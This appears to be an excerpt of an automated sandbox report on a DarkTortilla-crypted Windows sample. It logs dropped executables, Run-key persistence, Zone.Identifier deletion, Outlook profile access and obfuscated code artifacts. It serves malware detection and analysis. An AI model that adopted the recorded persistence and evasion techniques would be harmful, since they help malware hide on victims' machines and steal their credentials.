                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: msvcp140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Local\Temp\watchdog.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\Desktop\image.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\image.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: image.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: image.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                    Source: image.exeStatic file information: File size 2652672 > 1048576
                    Source: image.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x276800
                    Source: image.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: VsUPptm.exe.16.dr
                    Source: Binary string: InstallUtil.pdb source: VsUPptm.exe.16.dr
                    Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: ACID.exe, 0000000F.00000002.3441640640.00000000011EC000.00000004.00000020.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Yara detected DarkTortilla Crypter
                    Source: Yara matchFile source: 0.2.image.exe.3c8a281.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.61435a9.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.615681a.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.5dc1038.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.410d662.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.5ec1058.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.ACID.exe.62017da.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.6f40000.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.5ec1058.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c9d502.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.6f40000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.image.exe.3c47d02.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.3465569554.00000000040B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3447289746.000000000309A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2390999485.00000000060C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2396428280.0000000006F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3471337027.0000000006201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.3447289746.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2378327661.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2390999485.0000000005D41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2381424408.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: image.exe PID: 5024, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: ACID.exe PID: 6900, type: MEMORYSTR
                    Source: watchdog.exe.15.drStatic PE information: 0xC7142059 [Sun Nov 3 05:36:25 2075 UTC]
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_04BDB5A2 push eax; iretd 0_2_04BDB5E1
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0972C436 pushad ; iretd 0_2_0972C3D2
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0972C3D1 pushad ; iretd 0_2_0972C3D2
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_098A5E48 pushad ; retf 0_2_098A5E49
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_09AFAE90 pushad ; ret 0_2_09AFAE98
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_09AFAE04 push eax; ret 0_2_09AFAE05
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_09AF6C7D push eax; ret 0_2_09AF6D86
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2FA2BD push FFFFFF8Bh; iretd 0_2_0B2FA2BF
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2F7AED push eax; retf 0_2_0B2F7C2D
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2F2573 push ebx; ret 0_2_0B2F2579
                    Source: C:\Users\user\Desktop\image.exeCode function: 0_2_0B2F7C35 push ebx; retf 0_2_0B2F7CF2
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_013E42D9 push ebx; ret 15_2_013E42DA
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_07C5BFD1 pushad ; retf 15_2_07C5BFD2
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836C8DC push eax; retf 15_2_0836C8DD
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836C207 push 8B03FA99h; iretd 15_2_0836C20C
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_08366205 push eax; ret 15_2_0836630E
                    Source: C:\Users\user\AppData\Roaming\ACID.exeCode function: 15_2_0836DEBB push ebx; ret 15_2_0836DEC1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_01700C6D push edi; retf 16_2_01700C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_01700C55 push ebx; retf 16_2_01700C52
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_01700CCB push edi; retf 16_2_01700C7A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D887D8 push edi; iretd 16_2_06D887E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D845A0 push es; iretd 16_2_06D845AC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 16_2_06D8A9C0 push es; iretd 16_2_06D8A9CE
                    Source: image.exe, Ec91Lr.csHigh entropy of concatenated method names: 'g1C', 'Nx1', 'Sp8', 'g2H', 'k1L8Qq', 'Pz94Fp', 'p2LSs1', 'f9T4Mq', 'Gj8i6W', 'Zc80Aq'
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                    Source: 0.2.image.exe.3c8a281.3.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                    Source: 0.2.image.exe.2c3e1b8.0.raw.unpack, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                    Source: 0.2.image.exe.2c3e1b8.0.raw.unpack, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                    Source: 0.2.image.exe.2c3e1b8.0.raw.unpack, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                    Source: ACID.exe.7.dr, Ec91Lr.csHigh entropy of concatenated method names: 'g1C', 'Nx1', 'Sp8', 'g2H', 'k1L8Qq', 'Pz94Fp', 'p2LSs1', 'f9T4Mq', 'Gj8i6W', 'Zc80Aq'
                    Source: watchdog.exe.15.dr, rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.csHigh entropy of concatenated method names: 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
                    Source: watchdog.exe.15.dr, gabKErPURPS76kDKjrme.csHigh entropy of concatenated method names: 'EmwYECB1wGyvIA2snT', 'zQyq6GQCkVXH2m9ORWKDS7znEfc2l', 'X3TE6RCIZMD7ECwwVoqD8j43J8u', 'SwV7wVQkM24hXoCSpr83uLH4TEFtSUXME6LQS7', 'gIglw7CqsSJGzE2AtTN3JYbIYwYS1QQ7ADpw', 'aciMX0Q3f70STq8WXW'
                    Source: watchdog.exe.15.dr, tT7bk4FnxbYaKqMtWjIqvyKWh4J9tkfAvLZ8e5Y4BU.csHigh entropy of concatenated method names: 'nn9DM7TZkpnl4dSPqnpPS2oW', 'LztRLhG61h4KFshxtO7P7', 'G4vjdlUHNvtWZenTXSNdtGwCIYmCoKE77', '_5fQycwGNtn0lBuMB2jteITZhMQF3wG', 'ZJSZEAUpgBzwUgSXvnbC6lEhXmP5VpN2nCiGvnzMTR'
                    Source: C:\Users\user\AppData\Roaming\ACID.exeFile created: C:\Users\user\AppData\Local\Temp\watchdog.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\ACID.exeJump to dropped file

                    Boot Survival

                    barindex
                    Creates multiple autostart registry keys
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACIDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VsUPptmJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACIDJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ACIDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VsUPptmJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VsUPptmJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\image.exeFile opened: C:\Users\user\Desktop\image.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeFile opened: C:\Users\user\AppData\Roaming\ACID.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\VsUPptm\VsUPptm.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\image.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ACID.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
